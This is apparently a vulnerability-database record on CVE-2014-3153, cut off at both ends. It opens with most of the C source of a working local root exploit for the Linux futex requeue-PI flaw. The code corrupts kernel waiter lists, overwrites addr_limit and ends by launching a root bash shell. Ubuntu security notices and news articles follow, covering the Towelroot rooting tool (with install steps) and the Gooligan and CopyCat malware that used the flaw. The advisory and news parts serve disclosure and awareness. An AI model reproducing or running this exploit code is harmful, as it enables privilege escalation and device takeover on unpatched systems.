msgvec[1];\n\tstruct iovec msg_iov[8];\n\tunsigned long databuf[0x20];\n\tint i;\n\tint ret;\n\tstruct sigaction act;\n\t\n\tact.sa_handler = void_handler;\n\tsigemptyset(&act.sa_mask);\n\tact.sa_flags = 0;\n\tact.sa_restorer = NULL;\n\tsigaction(SIGNAL_THREAD_EXIT, &act, NULL);\n\t\n\twaiter_thread_tid = syscall(__NR_gettid);\n\tsetpriority(PRIO_PROCESS, 0, 12);\n\t\n\tsockfd = connect_server_socket();\n\tclientfd = sockfd;\n\t\n\tfor (i = 0; i < ARRAY_SIZE(databuf); i++) {\n\tdatabuf[i] = (unsigned long)waiter_plist;\n\t}\n\t\n\tfor (i = 0; i < ARRAY_SIZE(msg_iov); i++) {\n\tmsg_iov[i].iov_base = waiter_plist;\n\tmsg_iov[i].iov_len = (long)waiter_plist;\n\t}\n\tmsg_iov[1].iov_base = (void *)iov_base0;\n\t\n\tmsgvec[0].msg_hdr.msg_name = databuf;\n\tmsgvec[0].msg_hdr.msg_namelen = sizeof databuf;\n\tmsgvec[0].msg_hdr.msg_iov = msg_iov;\n\tmsgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov);\n\tmsgvec[0].msg_hdr.msg_control = databuf;\n\tmsgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf);\n\tmsgvec[0].msg_hdr.msg_flags = 0;\n\tmsgvec[0].msg_len = 0;\n\t\n\tsyscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 0);\n\t\n\tsync_with_parent(&do_socket_tid_read, &did_socket_tid_read);\n\t\n\tret = 0;\n\t\n\twhile (1) {\n\tret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);\n\tif (ret <= 0) {\n\t\tbreak;\n\t} else \n\t\tprintf(\"sendmmsg ret %d\\n\", ret);\n\t}\n\treturn NULL;\n}\n\nstatic void plist_set_next(struct list_head *node, struct list_head *head)\n{\n\tnode->next = head;\n\thead->prev = node;\n\tnode->prev = head;\n\thead->next = node;\n}\n\nstatic void setup_waiter_params(struct rt_mutex_waiter *rt_waiters)\n{\n\trt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9;\n\trt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13;\n\tplist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list);\n\tplist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list);\n}\n\nstatic bool do_exploit(void *waiter_plist)\n{\n\tvoid *magicval, *magicval2;\n\tstruct rt_mutex_waiter *rt_waiters;\n\tpid_t pid;\n\tpid_t pid6, pid7, pid12, pid11;\n\t\n\trt_waiters = PRIO_LIST_TO_WAITER(waiter_plist);\n\t\n\tsyscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\n\t\n\twhile (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) {\n\t\tusleep(10);\n\t}\n\t\n\tpthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6);\n\tpthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7);\n\t\n\tswag2 = 0;\n\tdo_socket_tid_read = 0;\n\tdid_socket_tid_read = 0;\n\t\n\tsyscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2);\n\t\n\tif (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) {\n\treturn false;\n\t}\n\t\n\tsetup_waiter_params(rt_waiters);\n\tmagicval = rt_waiters[0].list_entry.prio_list.next;\n\tprintf(\"Checking whether exploitable..\");\n\tpthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11);\n\t\n\tif (rt_waiters[0].list_entry.prio_list.next == magicval) {\n\t\tprintf(\"failed\\n\");\n\t\treturn false;\n\t}\n\tprintf(\"OK\\nSeaching good magic...\\n\");\n\tmagicval = rt_waiters[0].list_entry.prio_list.next;\n\t\n\tpthread_cancel_immediately(th11);\n\t\n\tpthread_t th11_1, th11_2;\n\twhile(1) {\n\t\tsetup_waiter_params(rt_waiters);\n\t\tth11_1 = create_thread_do_futex_lock_pi_with_priority(11);\n\t\tmagicval = rt_waiters[0].list_entry.prio_list.next;\n\t\thack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000);\n\t\trt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit;\n\t\t\n\t\tth11_2 = create_thread_do_futex_lock_pi_with_priority(11);\n\t\tmagicval2 = rt_waiters[1].list_entry.node_list.prev;\n\t\t\n\t\tprintf(\"magic1=%p magic2=%p\\n\", magicval, magicval2);\n\t\tif(magicval < magicval2) {\n\t\t\tprintf(\"Good magic found\\nHacking...\\n\");\n\t\t\tbreak;\n\t\t} else {\n\t\t\tpthread_cancel_immediately(th11_1);\n\t\t\tpthread_cancel_immediately(th11_2);\n\t\t}\t\t\n\t}\n\tpwaiter11 = NODE_LIST_TO_WAITER(magicval2);\n\tpthread_mutex_lock(&hacked_lock);\n\tpthread_kill(th11_1, SIGNAL_HACK_KERNEL);\n\tpthread_cond_wait(&hacked, &hacked_lock);\n\tpthread_mutex_unlock(&hacked_lock);\n\tclose(listenfd);\n\t\n\tstruct rt_mutex_waiter waiter11;\n\tstruct rt_mutex *pmutex;\n\tint len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11));\n\tif(len != sizeof(waiter11)) {\n\t\tpmutex = NULL;\n\t} else {\n\t\tpmutex = waiter11.lock;\n\t}\n\tfix_rt_mutex_waiter_list(pmutex);\n\t\n\tpthread_cancel_immediately(th11_1);\n\tpthread_cancel_immediately(th11_2);\n\t\n\tpthread_cancel_immediately(th7);\n\tpthread_cancel_immediately(th6);\n\tclose(clientfd);\n\tpthread_cancel_immediately(thread_client_to_setup_rt_waiter);\n\t\n\texit(0);\n}\n\n#define MMAP_ADDR_BASE\t0x0c000000\n#define MMAP_LEN\t\t0x0c001000\n\nint main(int argc, char *argv[])\n{\n\tunsigned long mapped_address;\n\tvoid *waiter_plist;\n\t\n\tprintf(\"CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)\\n\");\n \n\tmain_pid = gettid();\n\tif(fork() == 0) {\n\t\tiov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\n\t\tif (iov_base0 < 0xb0000000) {\n\t\t\tprintf(\"mmap failed?\\n\");\n\t\t\treturn 1;\n\t\t}\n\t\tiov_len0 = 0x10000;\n\t\t\n\t\tiov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\n\t\tif (iov_basex < MMAP_ADDR_BASE) {\n\t\t\tprintf(\"mmap failed?\\n\");\n\t\t\treturn 1;\n\t\t}\n\t\tiov_lenx = MMAP_LEN;\n\t\t\n\t\twaiter_plist = (void *)iov_basex + 0x400;\n\t\tpthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);\n\t\t\n\t\tsockfd = server_for_setup_rt_waiter();\n\t\tif (sockfd < 0) {\n\t\t\tprintf(\"Server failed\\n\");\n\t\t\treturn 1;\n\t\t}\n\t\t\n\t\tif (!do_exploit(waiter_plist)) {\n\t\t\treturn 1;\n\t\t}\n\t\treturn 0;\n\t}\n\n\twhile(getuid())\n\t\tusleep(100);\n\texecl(\"/bin/bash\", \"bin/bash\", NULL);\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:18", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges.", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2237-1", "href": "https://ubuntu.com/security/notices/USN-2237-1", "title": "Linux kernel (Quantal HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:42:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153", "CVE-2013-4483"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (OOM system crash). (CVE-2013-4483)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2238-1", "href": "https://ubuntu.com/security/notices/USN-2238-1", "title": "Linux kernel (Raring HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:31", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2014-0055"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the vhost-net subsystem of the Linux kernel. Guest \nOS users could exploit this flaw to cause a denial of service (host OS \ncrash). (CVE-2014-0055)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2235-1", "href": "https://ubuntu.com/security/notices/USN-2235-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:04", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2014-0055"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the vhost-net subsystem of the Linux kernel. Guest \nOS users could exploit this flaw to cause a denial of service (host OS \ncrash). (CVE-2014-0055)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2236-1", "href": "https://ubuntu.com/security/notices/USN-2236-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-2568", "CVE-2014-3153"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nAn information leak was discovered in the netfilter subsystem of the Linux \nkernel. An attacker could exploit this flaw to obtain sensitive information \nfrom kernel memory. (CVE-2014-2568)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2240-1", "href": "https://ubuntu.com/security/notices/USN-2240-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:27:25", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-0155", "CVE-2014-2568", "CVE-2014-3153"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel virtual machine's (kvm) \nvalidation of interrupt requests (irq). A guest OS user could exploit this \nflaw to cause a denial of service (host OS crash). (CVE-2014-0155)\n\nAn information leak was discovered in the netfilter subsystem of the Linux \nkernel. An attacker could exploit this flaw to obtain sensitive information \nfrom kernel memory. (CVE-2014-2568)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2241-1", "href": "https://ubuntu.com/security/notices/USN-2241-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:19", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-0155", "CVE-2014-2568", "CVE-2014-7283", "CVE-2014-3153"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel virtual machine's (kvm) \nvalidation of interrupt requests (irq). A guest OS user could exploit this \nflaw to cause a denial of service (host OS crash). (CVE-2014-0155)\n\nAn information leak was discovered in the netfilter subsystem of the Linux \nkernel. An attacker could exploit this flaw to obtain sensitive information \nfrom kernel memory. (CVE-2014-2568)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)\n\nHannes Frederic Sowa reported a hash collision ordering problem in the xfs \nfilesystem in the Linux kernel. A local user could exploit this flaw to \ncause filesystem corruption and a denial of service (oops or panic). \n(CVE-2014-7283)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2239-1", "href": "https://ubuntu.com/security/notices/USN-2239-1", "title": "Linux kernel (Saucy HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:28:23", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2013-4387", "CVE-2013-4483", "CVE-2014-1438", "CVE-2013-4470"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nDmitry Vyukov reported a flaw in the Linux kernel's handling of IPv6 UDP \nFragmentation Offload (UFO) processing. A remote attacker could leverage \nthis flaw to cause a denial of service (system crash). (CVE-2013-4387)\n\nHannes Frederic Sowa discovered a flaw in the Linux kernel's UDP \nFragmentation Offload (UFO). An unprivileged local user could exploit this \nflaw to cause a denial of service (system crash) or possibly gain \nadministrative privileges. (CVE-2013-4470)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (OOM system crash). (CVE-2013-4483)\n\nhalfdog reported an error in the AMD K7 and K8 platform support in the \nLinux kernel. An unprivileged local user could exploit this flaw on AMD \nbased systems to cause a denial of service (task kill) or possibly gain \nprivileges via a crafted application. (CVE-2014-1438)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2234-1", "href": "https://ubuntu.com/security/notices/USN-2234-1", "title": "Linux kernel (EC2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:23:13", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2013-4387", "CVE-2013-4483", "CVE-2014-1438", "CVE-2013-4470"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nDmitry Vyukov reported a flaw in the Linux kernel's handling of IPv6 UDP \nFragmentation Offload (UFO) processing. A remote attacker could leverage \nthis flaw to cause a denial of service (system crash). (CVE-2013-4387)\n\nHannes Frederic Sowa discovered a flaw in the Linux kernel's UDP \nFragmentation Offload (UFO). An unprivileged local user could exploit this \nflaw to cause a denial of service (system crash) or possibly gain \nadministrative privileges. (CVE-2013-4470)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (OOM system crash). (CVE-2013-4483)\n\nhalfdog reported an error in the AMD K7 and K8 platform support in the \nLinux kernel. An unprivileged local user could exploit this flaw on AMD \nbased systems to cause a denial of service (task kill) or possibly gain \nprivileges via a crafted application. (CVE-2014-1438)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2233-1", "href": "https://ubuntu.com/security/notices/USN-2233-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:14", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "[![Towelroot - One-Click Android Rooting Application Exploits Linux Kernel Vulnerability](https://1.bp.blogspot.com/-tE3aUIbjEts/U6Feq5kqyMI/AAAAAAAAcGU/KoIG0HblHzU/s728/one-click-android-rooting-software-app.jpg)](<https://1.bp.blogspot.com/-tE3aUIbjEts/U6Feq5kqyMI/AAAAAAAAcGU/KoIG0HblHzU/s1600/one-click-android-rooting-software-app.jpg>)\n\nWaiting for the root access for your AT&T or Verizon Android phone? Then there is really a Great News for you!\n\n \n\n\n**Geohot** (aka George Hotz) - a famed cracker who was responsible for hacking the PlayStation 3 and subsequently being sued by Sony - has built and released a root tool called **Towelroot** on Sunday night that will let most Android smartphones users to root their [Android](<https://thehackernews.com/search/label/Android>) device with one click only, as long as it has an unpatched version of the Linux kernel.\n\n \n**EXPLOITS LINUX KERNEL VULNERABILITY **\n\nTowelroot application exploits the same vulnerability (CVE-2014-3153) which was recently disclosed by the hacker Pinkie Pie in the [Linux kernel version 3.14.5](<https://thehackernews.com/2014/06/linux-kernel-vulnerable-to-privilege_7.html>) and most versions of other Android devices, which could be leveraged by hackers to potentially acquire root access on affected devices.\n\n \n\n\nHaving [root access](<https://thehackernews.com/search/label/Rooting%20android>) of your device simply means you make System-level changes to your device such as accessing and modifying any file or program using any mode (single- or multi-user). It is just like operating an administrator account on a computer.\n\n \n**SUPPORTED DEVICES**\n\nTowelroot supports handful of devices so far including some particularly tough phones. here\u2019s the list:\n\n * AT&T Galaxy S5\n * Verizon Galaxy S5\n * Galaxy S4 Active\n * Nexus 5\n * AT&T Galaxy Note 3\n * Verizon Galaxy Note 3\n * Also some users have even reported its success with the all time favorite company of GeoHot, Sony Xperia SP C5303.\n\nGeohot became famous for being the first person to carrier unlock the original iPhone in 2007 and later for creating the limera1n jailbreak tool for future versions of the iPhone. He gained fame after subsequently hacking the software of the PlayStation 3 console, thereby opening up the ability to add homebrew and play pirated games, for which he was taken to court by Sony.\n\n \n**HOW TO ROOT ANDROID DEVICE**\n\n**Step 1:** Download Android Rooting application from [towelroot.com](<https://towelroot.com/>) and install it. \n \n**Step 2:** While Installation you might receive warning message saying that Towelroot \"_contains code that attempts to bypass Android's security_\". Just hit Install anyway after selecting the checkbox: \"_I understand and still want to install it_\". \n \n**Step 3:** Once the Towelroot installation completes, launch the application and click the button reading \"_make it ra1n_\" and it will force your device to reboot. \n \n**Step 4: **After the device reboots to home screen your phone will be rooted with its bootloader unlocked. Cheers! \n \n\n\nAlong with the Android users who were itching to get Android rooting technique for their devices and doing tons of things such as customizations, patching apps and installing third-party ROMs, the new tool will also allow cybercriminals as well to gain administrative access to a victim\u2019s phone.\n\n \n\n\nSpecifically, at the same time the cyber criminal with the administrative access could potentially run malicious code, retrieve files, bypass third-party or security applications including containers like Samsung\u2019s secure Knox sub-operating system, and place backdoors for future access on users\u2019 devices.\n\n \n**$18000 BOUNTY GOES TO GEOHOT OR PINKIE PIE?**\n\nTill now, the developer edition of Samsung Galaxy S5 for Verizon and At&T have not receive root, for the reason XDA members started up a [Crowd funded Bounty program](<https://thehackernews.com/2014/05/developers-raise-bounty-of-17600-for.html>), now valued at over $18,000, for achieving the root on Verizon and AT&T Samsung Galaxy S5 devices.\n\n \n\n\nSo, now the question is Who gonna fetch this raised bounty by XDA developers? On one hand, where the famed developer George Hotz (GeoHot) have developed the tool to root Samsung Galaxy S5 (Verizon and AT&T) and other Android devices, on the other hand Pinkie Pie have discovered the vulnerability exploited in the rooting tool, TowelRoot by GeoHot.\n", "modified": "2014-06-25T18:50:44", "published": "2014-06-17T22:49:00", "id": "THN:B829D3A52189C266464176E0C3E66EE3", "href": "https://thehackernews.com/2014/06/towelroot-one-click-android-rooting.html", "type": "thn", "title": "Towelroot : One-Click Android Rooting Tool Released By Geohot", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:59", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153", "CVE-2013-6282"], "description": "[![](https://2.bp.blogspot.com/-V8phNGgfpSE/WD8Aft7xCiI/AAAAAAAAqZU/HmwEEw_qQFEcCUYdJ2f3GJxZ2mo4MBklgCLcB/s1600/android-malware.png)](<https://2.bp.blogspot.com/-V8phNGgfpSE/WD8Aft7xCiI/AAAAAAAAqZU/HmwEEw_qQFEcCUYdJ2f3GJxZ2mo4MBklgCLcB/s1600/android-malware.png>)\n\nIf you own an Android smartphone, Beware! A new Android malware that has already breached more than 1 Million Google accounts is infecting around 13,000 devices every day. \n \nDubbed **Gooligan**, the malware roots vulnerable Android devices to steal email addresses and authentication tokens stored on them. \n \nWith this information in hands, the attackers are able to hijack your Google account and access your sensitive information from Google apps including Gmail, Google Photos, Google Docs, Google Play, Google Drive, and G Suite. \n \nResearchers found traces of Gooligan code in dozens of legitimate-looking Android apps on 3rd-party app stores, which if downloaded and installed by an Android user, malware starts sending your device\u2019s information and stolen data to its Command and Control (C&C) server. \n\n\n> \"Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153),\" researchers said in a [blog post](<http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/>).\n\n> \"If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely.\"\n\nAccording to CheckPoint security researchers, who uncovered the malware, anyone running an older version of the Android operating system, including Android 4.x (Jelly Bean, KitKat) and 5.x, (Lollipop) is most at risk, which represents nearly 74% of Android devices in use today. \n\n\n> \"These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user,\" researchers added.\n\nOnce hack into any Android device, Gooligan also generates revenues for the cyber criminals by fraudulently buying and installing apps from Google Play Store and rating them and writing reviews on behalf of the phone's owner. The malware also installs adware to generate revenue. \n \n\n\n### **How to check if your Google account has been compromised with this malware? **\n\n \nCheck Point has published an online tool to check if your Android device has been infected with the Gooligan malware. Just open \u2018[Gooligan Checker](<https://gooligan.checkpoint.com/>)\u2019 and enter your Google email address to find out if you've been hacked. \n \nIf you found yourself infected, Adrian Ludwig, Google's director of Android security, has recommended you to run a clean installation of the operating system on your Android device. \n \nThis process is called 'Flashing,' which is quite a complicated process. So, the company recommends you to power off your device and approach a certified technician or your mobile service provider in order to re-flash your device.\n", "modified": "2016-11-30T16:44:21", "published": "2016-11-30T05:44:00", "id": "THN:94A8976C00B182A05720DD5149AC5DE0", "href": "https://thehackernews.com/2016/11/hack-google-account.html", "type": "thn", "title": "Over 1 Million Google Accounts Hacked by 'Gooligan' Android Malware", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:18:06", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153", "CVE-2015-3636", "CVE-2013-6282"], "description": "[![android-copycat-rooting-malware](https://4.bp.blogspot.com/-0PWhl6H9Y60/WV5wVvXyHzI/AAAAAAAAtfI/WbYQLAVlyRsR69nqxKmJiaD9zOLuwdv8ACLcBGAs/s1600/android-copycat-rooting-malware.png)](<https://4.bp.blogspot.com/-0PWhl6H9Y60/WV5wVvXyHzI/AAAAAAAAtfI/WbYQLAVlyRsR69nqxKmJiaD9zOLuwdv8ACLcBGAs/s1600/android-copycat-rooting-malware.png>)\n\nA newly uncovered malware strain has already infected more than 14 Million Android devices around the world, earning its operators approximately $1.5 Million in fake ad revenues in just two months. \n \nDubbed **CopyCat**, the malware has capabilities to root infected devices, establish persistency, and inject malicious code into** Zygote** \u2013 a daemon responsible for launching apps on Android, providing the hackers full access to the devices. \n \n\n\n### Over 14 Million Devices Infected; 8 Million of them Rooted\n\n \nAccording to the security researchers at Check Point who [discovered](<http://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/>) this malware strain, CopyCat malware has infected 14 million devices, rooted nearly 8 million of them, had 3.8 million devices serve ads, and 4.4 million of them were used to steal credit for installing apps on Google Play. \n \nWhile the majority of victims hit by the CopyCat malware resides in South and Southeast Asia with India being the most affected country, more than 280,000 Android devices in the United States were also infected. \n \nWhile there's no evidence that the CopyCat malware has been distributed on Google Play, the Check Point researchers believe that millions of victims got infected through third-party app downloads and phishing attacks. \n \nLike **[Gooligan](<https://thehackernews.com/2016/11/hack-google-account.html>)**, CopyCat malware also uses_ \"state-of-the-art technology\"_ to carry out various forms of advertisement fraud. \n \nCopyCat uses several exploits, including CVE-2013-6282 (VROOT), CVE-2015-3636 (PingPongRoot), and CVE-2014-3153 (Towelroot) to hit devices running Android 5.0 and earlier, which are all widely used and very old, with the most recent uncovered 2 years ago. \n \nThe success of the campaign clearly indicates that millions of Android users still rely on old, unpatched, unsupported devices. \n \n\n\n### Here's How CopyCat Infects Android Devices\n\n \nCopyCat disguises as a popular Android app that users download from third-party stores. Once downloaded, the malware starts collecting data about the infected device and downloads rootkits to help root the victim's smartphone. \n \nAfter rooting the Android device, the CopyCat malware removes security defenses from the device and injects code into the Zygote app launching process to fraudulently install apps and display ads and generate revenue. \n\n\n> \"CopyCat abuses the Zygote process to display fraudulent ads while hiding their origin, making it difficult for users to understand what's causing the ads to pop-up on their screens,\" Check Point researchers say. \n\n> \"CopyCat also installs fraudulent apps directly to the device, using a separate module. These activities generate large amounts of profits for the creators of CopyCat, given a large number of devices infected by the malware.\"\n\nIn just two months of time span, the CopyCat malware helped the hackers make more than $1.5 Million in revenue. The majority of profit (over $735,000) came from nearly 4.9 million fake installations on infected devices, which displays up to 100 million ads. \n \nThe majority of victims are located in India, Pakistan, Bangladesh, Indonesia, and Myanmar, though over 381,000 devices in Canada and more than 280,000 devices in the U.S. are infected with CopyCat. \n \n\n\n### CopyCat Malware Spreads Using Chinese Advertising Network\n\n \nWhile there's no direct evidence on who is behind the CopyCat malware campaign, researchers at Check Point found below-mentioned connections that indicate hackers might have used Chinese advertising network 'MobiSummer' for the distribution of the malware. \n\n\n * CopyCat malware and MobiSummer operate on the same server\n * Several lines of CopyCat's code is signed by MobiSummer\n * CopyCat and MobiSummer use the same remote services\n * CopyCat did not target Chinese users despite over half of the victims residing in Asia\n\n> \"It is important to note that while these connections exist, it does not necessarily mean the malware was created by the company, and it is possible the perpetrators behind it used MobiSummer\u2019s code and infrastructure without the firm\u2019s knowledge\" Check Point researchers say. \n\nAndroid users on older devices are still vulnerable to the CopyCat attack, but only if they are downloading apps from third-party app stores. \n \nIn March 2017, Check Point researchers informed Google about the CopyCat campaign, and the tech giant has already updated Play Protect to block the malware. \n \nSo, Android users even on older devices are protected through Play Protect, which is updated regularly as malware strains such as CopyCat continue to grow.\n", "modified": "2017-07-07T14:13:25", "published": "2017-07-06T05:17:00", "id": "THN:608C3D3E206B655519193316EAFA2C22", "href": "https://thehackernews.com/2017/07/copycat-rooting-malware.html", "type": "thn", "title": "CopyCat Android Rooting Malware Infected 14 Million Devices", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:49", "bulletinFamily": "info", "cvelist": ["CVE-2014-3145", "CVE-2014-3144", "CVE-2014-3153", "CVE-2014-0476"], "description": "[![Linux Kernel Vulnerable to Privilege Escalation and DoS 